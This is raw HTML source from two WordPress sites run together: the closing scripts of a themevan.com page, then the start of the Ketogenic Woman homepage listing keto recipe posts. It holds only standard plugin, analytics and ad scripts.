pum_debug_vars = {"debug_mode_enabled":"Popup Maker: Debug Mode Enabled","debug_started_at":"Debug started at:","debug_more_info":"For more information on how to use this information visit https:\/\/docs.wppopupmaker.com\/?utm_medium=js-debug-info&utm_campaign=ContextualHelp&utm_source=browser-console&utm_content=more-info","global_info":"Global Information","localized_vars":"Localized variables","popups_initializing":"Popups Initializing","popups_initialized":"Popups Initialized","single_popup_label":"Popup: #","theme_id":"Theme ID: ","label_method_call":"Method Call:","label_method_args":"Method Arguments:","label_popup_settings":"Settings","label_triggers":"Triggers","label_cookies":"Cookies","label_delay":"Delay:","label_conditions":"Conditions","label_cookie":"Cookie:","label_settings":"Settings:","label_selector":"Selector:","label_mobile_disabled":"Mobile Disabled:","label_tablet_disabled":"Tablet Disabled:","label_event":"Event: %s","triggers":{"click_open":"Click Open","auto_open":"Time Delay \/ Auto Open"},"cookies":{"on_popup_close":"On Popup Close","on_popup_open":"On Popup Open","pum_sub_form_success":"Subscription Form: Successful","pum_sub_form_already_subscribed":"Subscription Form: Already Subscribed","manual":"Manual JavaScript","cf7_form_success":"Contact Form 7 Success"}}; var pum_sub_vars = {"ajaxurl":"https:\/\/www.themevan.com\/main\/wp-admin\/admin-ajax.php","message_position":"top"}; var pum_popups = {"pum-31494":{"disable_on_mobile":false,"disable_on_tablet":false,"custom_height_auto":false,"scrollable_content":false,"position_from_trigger":false,"position_fixed":true,"overlay_disabled":true,"stackable":false,"disable_reposition":false,"close_on_overlay_click":false,"close_on_esc_press":false,"close_on_f4_press":false,"disable_form_reopen":false,"disable_accessibility":false,"triggers":[{"type":"auto_open","settings":{"cookie_name":["When Close","When Subscribe Successful","When Subscribed"],"delay":"1000"}}],"cookies":[{"event":"on_popup_close","settings":{"name":"When Close","key":"","session":true,"time":"1 month","path":true}},{"event":"pum_sub_form_success","settings":{"name":"When Subscribe Successful","key":"","session":false,"time":"1 month","path":true}},{"event":"pum_sub_form_already_subscribed","settings":{"name":"When Subscribed","key":"","session":false,"time":"1 month","path":true}}],"theme_id":"30941","size":"small","responsive_min_width":"0%","responsive_max_width":"100%","custom_width":"640px","custom_height":"380px","animation_type":"slide","animation_speed":"350","animation_origin":"left bottom","location":"left bottom","position_top":"0","position_bottom":"0","position_left":"0","position_right":"0","zindex":"1999999999","close_button_delay":"0","theme_slug":"bottom-left","id":31494,"slug":"newsletter-popup"}};</script> <script type='text/javascript' src='//www.themevan.com/main/wp-content/uploads/pum/pum-site-scripts.js?defer&#038;generated=1555492032&#038;ver=1.8.5'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-includes/js/hoverIntent.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/js_composer/assets/lib/waypoints/waypoints.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/themevan-toolkit/assets/js/themevan-toolkit.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/enlighter/resources/mootools-core-yc.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/enlighter/resources/EnlighterJS.min.js'></script> <script type='text/javascript'>var wpgdprcData = {"ajaxURL":"https:\/\/www.themevan.com\/main\/wp-admin\/admin-ajax.php","ajaxSecurity":"98f337b11e","consentVersion":"1","consentStatus":"0","isMultisite":"","path":"\/","blogId":""};</script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/wp-gdpr-compliance/assets/js/front.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/js_composer/assets/lib/bower/skrollr/dist/skrollr.min.js'></script> <script type="text/javascript">EnlighterJS_Config = {"selector":{"block":"pre.EnlighterJSRAW","inline":"code.EnlighterJSRAW"},"language":"generic","theme":"enlighter","indent":2,"hover":"hoverEnabled","showLinenumbers":true,"rawButton":true,"infoButton":true,"windowButton":true,"rawcodeDoubleclick":false,"grouping":true,"cryptex":{"enabled":false,"email":"[email protected]"}};!function(){var a=function(a){var b="Enlighter Error: ";console.error?console.error(b+a):console.log&&console.log(b+a)};return window.addEvent?"undefined"==typeof EnlighterJS?void a("Javascript Resources not loaded yet!"):"undefined"==typeof EnlighterJS_Config?void a("Configuration not loaded yet!"):void window.addEvent("domready",function(){EnlighterJS.Util.Init(EnlighterJS_Config.selector.block,EnlighterJS_Config.selector.inline,EnlighterJS_Config)}):void a("MooTools Framework not loaded yet!")}();;</script><script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'>_stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.2.1',blog:'100393732',post:'13422',tz:'8',srv:'www.themevan.com'} ]); _stq.push([ 'clickTrackerInit', '100393732', '13422' ]);</script> <div id="cookie-notice" role="banner" class="cn-bottom bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Ok</a></div></div></body></html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0"> <link rel="profile" href="https://gmpg.org/xfn/11" /> <link rel="pingback" href="https://ketogenicwoman.com/xmlrpc.php" /> <link rel="shortcut icon" href="https://ketogenicwoman.com/wp-content/uploads/2018/11/KW.jpg" /><link rel="apple-touch-icon" href="https://ketogenicwoman.com/wp-content/uploads/2018/11/KW.jpg" /><title>Ketogenic Woman - Eat Well. Be Satisfied. Live Life.</title> <meta name="description" content="Eat Well. Be Satisfied. Live Life." /> <link rel="canonical" href="https://ketogenicwoman.com/" /> <link rel="next" href="https://ketogenicwoman.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Ketogenic Woman - Eat Well. Be Satisfied. Live Life." /> <meta property="og:description" content="Eat Well. Be Satisfied. Live Life." /> <meta property="og:url" content="https://ketogenicwoman.com/" /> <meta property="og:site_name" content="Ketogenic Woman" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://ketogenicwoman.com/#organization","name":"","url":"https://ketogenicwoman.com/","sameAs":[]},{"@type":"WebSite","@id":"https://ketogenicwoman.com/#website","url":"https://ketogenicwoman.com/","name":"Ketogenic Woman","publisher":{"@id":"https://ketogenicwoman.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://ketogenicwoman.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://ketogenicwoman.com/#webpage","url":"https://ketogenicwoman.com/","inLanguage":"en-US","name":"Ketogenic Woman - Eat Well. Be Satisfied. Live Life.","isPartOf":{"@id":"https://ketogenicwoman.com/#website"},"about":{"@id":"https://ketogenicwoman.com/#organization"},"description":"Eat Well. Be Satisfied. Live Life."}]}</script> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Ketogenic Woman &raquo; Feed" href="https://ketogenicwoman.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Ketogenic Woman &raquo; Comments Feed" href="https://ketogenicwoman.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/ketogenicwoman.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=731ab13a1601c31a46fdc5b218a03556"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://ketogenicwoman.com/wp-includes/css/dist/block-library/style.min.css?ver=731ab13a1601c31a46fdc5b218a03556' type='text/css' media='all' /> <link rel='stylesheet' id='mantra-style-css' href='https://ketogenicwoman.com/wp-content/themes/mantra/style.css?ver=3.0.5' type='text/css' media='all' /> <style id='mantra-style-inline-css' type='text/css'> #wrapper { max-width: 1050px; } #content { width: 100%; max-width:750px; max-width: calc( 100% - 300px ); } #primary, #secondary { width:300px; } #primary .widget-title, #secondary .widget-title { margin-right: -2em; text-align: left; } html { font-size:18px; } #access ul li { background-color:#D3D1A8} body, input, textarea {font-family:Segoe UI, Arial, sans-serif; } #content h1.entry-title a, #content h2.entry-title a, #content h1.entry-title, #content h2.entry-title, #front-text1 h2, #front-text2 h2 {font-family:Georgia, Times New Roman, Times, serif; } .widget-area {font-family:Helvetica, sans-serif; } .entry-content h1, .entry-content h2, .entry-content h3, .entry-content h4, .entry-content h5, .entry-content h6 {font-family:Georgia, Times New Roman, Times, serif; } .nocomments, .nocomments2 {display:none;} #header-container > div { margin-top:20px; } #header-container > div { margin-left:40px; } body { background-color:#faf8f8 !important; } #header { background-color:#90A46E; } #footer { background-color:#222222; } #footer2 { background-color:#171717; } #site-title span a { color:#223C10; } #site-description { color:#999999; } #content, #content p, #content ul, #content ol { color:#333333 ;} .widget-area a:link, .widget-area a:visited, a:link, a:visited ,#searchform #s:hover, #container #s:hover, #access a:hover, #wp-calendar tbody td a, #site-info a, #site-copyright a, #access li:hover > a, #access ul ul:hover > a { color:#0D85CC; } a:hover, .entry-meta a:hover, .entry-utility a:hover, .widget-area a:hover { color:#12a7ff; } #content .entry-title a, #content .entry-title, #content h1, #content h2, #content h3, #content h4, #content h5, #content h6 { color:#223C10; } #content .entry-title a:hover { color:#000000; } .widget-title { background-color:#ececec; } .widget-title { color:#A65F26; } #footer-widget-area .widget-title { color:#0C85CD; } #footer-widget-area a { color:#666666; } #footer-widget-area a:hover { color:#888888; } #content .wp-caption { background-image:url(https://ketogenicwoman.com/wp-content/themes/mantra/resources/images/pins/Pin2.png); } #content p:not(:last-child), .entry-content ul, .entry-summary ul, .entry-content ol, .entry-summary ol { margin-bottom:1.5em;} .entry-meta .entry-time { display:none; } #branding { height:200px ;} /* Mantra Custom CSS */ </style> <link rel='stylesheet' id='mantra-mobile-css' href='https://ketogenicwoman.com/wp-content/themes/mantra/resources/css/style-mobile.css?ver=3.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='addtoany-css' href='https://ketogenicwoman.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.15' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://ketogenicwoman.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://ketogenicwoman.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://ketogenicwoman.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1'></script> <script type='text/javascript' src='https://ketogenicwoman.com/wp-content/plugins/convertkit/resources/frontend/jquery.cookie.min.js?ver=1.4.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var ck_data = {"ajaxurl":"https:\/\/ketogenicwoman.com\/wp-admin\/admin-ajax.php","post_has_tag":""}; /* ]]> */ </script> <script type='text/javascript' src='https://ketogenicwoman.com/wp-content/plugins/convertkit/resources/frontend/wp-convertkit.js?ver=1.7.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var mantra_options = {"responsive":"1","image_class":"imageSeven","equalize_sidebars":"0"}; /* ]]> */ </script> <script type='text/javascript' src='https://ketogenicwoman.com/wp-content/themes/mantra/resources/js/frontend.js?ver=3.0.5'></script> <link rel='https://api.w.org/' href='https://ketogenicwoman.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://ketogenicwoman.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://ketogenicwoman.com/wp-includes/wlwmanifest.xml" /> <script data-cfasync="false"> window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={}; (function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script"); </script> <style> :root { --mv-create-radius: 0; } </style> <!--[if lte IE 8]> <style type="text/css" media="screen"> #access ul li, .edit-link a , #footer-widget-area .widget-title, .entry-meta,.entry-meta .comments-link, .short-button-light, .short-button-dark ,.short-button-color ,blockquote { position:relative; behavior: url(https://ketogenicwoman.com/wp-content/themes/mantra/resources/js/PIE/PIE.php); } #access ul ul { -pie-box-shadow:0px 5px 5px #999; } #access ul li.current_page_item, #access ul li.current-menu-item , #access ul li ,#access ul ul ,#access ul ul li, .commentlist li.comment ,.commentlist .avatar, .nivo-caption, .theme-default .nivoSlider { behavior: url(https://ketogenicwoman.com/wp-content/themes/mantra/resources/js/PIE/PIE.php); } </style> <![endif]--><style type="text/css" id="custom-background-css"> body.custom-background { background-color: #ffffff; } </style> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-125093167-1', 'auto'); ga('send', 'pageview'); </script> <!--[if lt IE 9]> <script> document.createElement('header'); document.createElement('nav'); document.createElement('section'); document.createElement('article'); document.createElement('aside'); document.createElement('footer'); document.createElement('hgroup'); </script> <![endif]--> </head> <body data-rsssl=1 class="home blog custom-background"> <div id="toTop"><i class="crycon-back2top"></i> </div> <div id="wrapper" class="hfeed"> <header id="header"> <div id="masthead"> <div id="branding" role="banner"> <img id="bg_image" alt="Ketogenic Woman" title="" src="https://ketogenicwoman.com/wp-content/uploads/2018/11/cropped-Ketogenic-Woman-LogoMantra-2018.jpg" /> <div id="header-container"> <a href="https://ketogenicwoman.com/" id="linky"></a> <div class="socials" id="sheader"> </div> </div> <div style="clear:both;"></div> </div> <a id="nav-toggle"><span>&nbsp; Menu</span></a> <nav id="access" class="jssafe" role="navigation"> <div class="skip-link screen-reader-text"><a href="#content" title="Skip to content">Skip to content</a></div> <div class="menu"><ul id="prime_nav" class="menu"><li id="menu-item-314" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-314"><a href="https://ketogenicwoman.com/getting-started-keto-diet-plan/">Getting Started-Free Grocery List</a></li> <li id="menu-item-119" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-119"><a href="https://ketogenicwoman.com/category/recipes/">Keto Recipes</a></li> <li id="menu-item-2386" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-2386"><a href="https://ketogenicwoman.com/category/egg-fast-diet/">Egg Fast Diet</a> <ul class="sub-menu"> <li id="menu-item-2387" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2387"><a href="https://ketogenicwoman.com/category/recipes/keto-egg-fast-recipes/">Keto Egg Fast Recipes</a></li> </ul> </li> <li id="menu-item-120" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-120"><a href="https://ketogenicwoman.com/ketowoman/">About</a></li> </ul></div> </nav> </div> <div style="clear:both;"> </div> </header> <div id="main" class="main"> <div id="forbottom"> <div style="clear:both;"> </div> <section id="container"> <div id="content" role="main"> <ul class="yoyo"> <li id="custom_html-4" class="widget_text widget-container widget_custom_html"><div class="textwidget custom-html-widget"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> Affiliate Disclosure <span style="font-size:small">We participate in the Amazon Services LLC Associates Program. Therefore, some of these recommendations will result in this page earning a small commission which will not affect the price that you pay. </span></div></li> </ul> <nav id="nav-above" class="navigation"> <div class="nav-previous"><a href="https://ketogenicwoman.com/page/2/"><span class="meta-nav">&laquo;</span> Older posts</a></div> <div class="nav-next"></div> </nav> <article id="post-1998" class="post-1998 post type-post status-publish format-standard has-post-thumbnail hentry category-ketogenic-diet-information tag-electrolyte-drink tag-electrolytes tag-feel-better-fast tag-homemade tag-keto-flu tag-salt tag-sugar-free"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/homemade-keto-electrolyte-drink/" title="Permalink to The Best Homemade Electrolyte Drink to Beat Keto Flu Fast" rel="bookmark"> The Best Homemade Electrolyte Drink to Beat Keto Flu Fast </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-05-15T18:42:32-07:00"> <a href="https://ketogenicwoman.com/homemade-keto-electrolyte-drink/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-05-16T06:12:24-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/ketogenic-diet-information/" rel="tag">Ketogenic Diet Info</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/homemade-keto-electrolyte-drink/#respond">Leave a comment</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/homemade-keto-electrolyte-drink/" title="The Best Homemade Electrolyte Drink to Beat Keto Flu Fast"><img width="225" height="150" src="https://ketogenicwoman.com/wp-content/uploads/2019/05/The-Best-Homemade-Electrolyte-Drink-to-Beat-Keto-Flu-Fast-225x150.jpg" class="alignleft post-thumbnail wp-post-image" alt="This recipe for the best and most delicious electrolyte drink will help you beat the Keto Flu FAST! This homemade recipe is sugar free, hydrating, and it will make you feel better fast. It&#039;s an all natural Keto electrolyte drink you won&#039;t regret learning!" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/05/The-Best-Homemade-Electrolyte-Drink-to-Beat-Keto-Flu-Fast-225x150.jpg 225w, https://ketogenicwoman.com/wp-content/uploads/2019/05/The-Best-Homemade-Electrolyte-Drink-to-Beat-Keto-Flu-Fast-300x200.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/05/The-Best-Homemade-Electrolyte-Drink-to-Beat-Keto-Flu-Fast-150x100.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/05/The-Best-Homemade-Electrolyte-Drink-to-Beat-Keto-Flu-Fast.jpg 600w" sizes="(max-width: 225px) 100vw, 225px" /></a> <p>The Best Homemade Electrolyte Drink to Beat Keto Flu Fast What is Keto Flu? As amazing as the keto diet is for losing weight fast, those first few days or weeks can be pretty rough! Or what happens if you go on vacation and in spite of your good intentions … <a class="continue-reading-link" href="https://ketogenicwoman.com/homemade-keto-electrolyte-drink/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/homemade-keto-electrolyte-drink/" data-a2a-title="The Best Homemade Electrolyte Drink to Beat Keto Flu Fast"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fhomemade-keto-electrolyte-drink%2F&amp;linkname=The%20Best%20Homemade%20Electrolyte%20Drink%20to%20Beat%20Keto%20Flu%20Fast" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fhomemade-keto-electrolyte-drink%2F&amp;linkname=The%20Best%20Homemade%20Electrolyte%20Drink%20to%20Beat%20Keto%20Flu%20Fast" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fhomemade-keto-electrolyte-drink%2F&amp;linkname=The%20Best%20Homemade%20Electrolyte%20Drink%20to%20Beat%20Keto%20Flu%20Fast" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fhomemade-keto-electrolyte-drink%2F&amp;linkname=The%20Best%20Homemade%20Electrolyte%20Drink%20to%20Beat%20Keto%20Flu%20Fast" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fhomemade-keto-electrolyte-drink%2F&amp;linkname=The%20Best%20Homemade%20Electrolyte%20Drink%20to%20Beat%20Keto%20Flu%20Fast" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/electrolyte-drink/" rel="tag">electrolyte drink</a>, <a href="https://ketogenicwoman.com/tag/electrolytes/" rel="tag">electrolytes</a>, <a href="https://ketogenicwoman.com/tag/feel-better-fast/" rel="tag">feel better fast</a>, <a href="https://ketogenicwoman.com/tag/homemade/" rel="tag">homemade</a>, <a href="https://ketogenicwoman.com/tag/keto-flu/" rel="tag">keto flu</a>, <a href="https://ketogenicwoman.com/tag/salt/" rel="tag">salt</a>, <a href="https://ketogenicwoman.com/tag/sugar-free/" rel="tag">sugar free</a></span> </footer> </article> <article id="post-2041" class="post-2041 post type-post status-publish format-standard has-post-thumbnail hentry category-keto-main-meals tag-one-pan-keto-recipe tag-shrimp"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/keto-sheet-pan-shrimp-and-vegetables/" title="Permalink to Keto Sheet Pan Dinner &#8211; Roasted Asian Shrimp and Veggies" rel="bookmark"> Keto Sheet Pan Dinner &#8211; Roasted Asian Shrimp and Veggies </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-03-15T20:00:28-07:00"> <a href="https://ketogenicwoman.com/keto-sheet-pan-shrimp-and-vegetables/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-04-26T21:24:12-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/recipes/keto-main-meals/" rel="tag">Keto Main Meals</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/keto-sheet-pan-shrimp-and-vegetables/#respond">Leave a comment</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/keto-sheet-pan-shrimp-and-vegetables/" title="Keto Sheet Pan Dinner - Roasted Asian Shrimp and Veggies"><img width="150" height="150" src="https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Shrimp-and-Veggies-150x150.jpg" class="alignleft post-thumbnail wp-post-image" alt="Keto Asian Shrimp Sheet Pan recipe" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Shrimp-and-Veggies-150x150.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Shrimp-and-Veggies-300x300.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Shrimp-and-Veggies-200x200.jpg 200w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Shrimp-and-Veggies-320x320.jpg 320w, https://ketogenicwoman.com/wp-content/uploads/2019/03/Keto-Shrimp-and-Veggies.jpg 400w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Keto Sheet Pan Dinner &#8211; Roasted Asian Shrimp &amp; Vegetables I am a huge fan of any meal that can be cooked in one pan like this fast and easy Keto Shrimp and Vegetable sheet pan meal! This is even faster than ordering a pizza and so much healthier for … <a class="continue-reading-link" href="https://ketogenicwoman.com/keto-sheet-pan-shrimp-and-vegetables/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/keto-sheet-pan-shrimp-and-vegetables/" data-a2a-title="Keto Sheet Pan Dinner – Roasted Asian Shrimp and Veggies"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-sheet-pan-shrimp-and-vegetables%2F&amp;linkname=Keto%20Sheet%20Pan%20Dinner%20%E2%80%93%20Roasted%20Asian%20Shrimp%20and%20Veggies" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-sheet-pan-shrimp-and-vegetables%2F&amp;linkname=Keto%20Sheet%20Pan%20Dinner%20%E2%80%93%20Roasted%20Asian%20Shrimp%20and%20Veggies" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-sheet-pan-shrimp-and-vegetables%2F&amp;linkname=Keto%20Sheet%20Pan%20Dinner%20%E2%80%93%20Roasted%20Asian%20Shrimp%20and%20Veggies" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-sheet-pan-shrimp-and-vegetables%2F&amp;linkname=Keto%20Sheet%20Pan%20Dinner%20%E2%80%93%20Roasted%20Asian%20Shrimp%20and%20Veggies" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-sheet-pan-shrimp-and-vegetables%2F&amp;linkname=Keto%20Sheet%20Pan%20Dinner%20%E2%80%93%20Roasted%20Asian%20Shrimp%20and%20Veggies" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/one-pan-keto-recipe/" rel="tag">One Pan Keto Recipe</a>, <a href="https://ketogenicwoman.com/tag/shrimp/" rel="tag">shrimp</a></span> </footer> </article> <article id="post-2012" class="post-2012 post type-post status-publish format-standard has-post-thumbnail hentry category-egg-fast-diet tag-keto-egg-fast-recipes tag-lemon"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/keto-egg-fast-lemon-bars/" title="Permalink to Keto Egg Fast Lemon Bars" rel="bookmark"> Keto Egg Fast Lemon Bars </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" 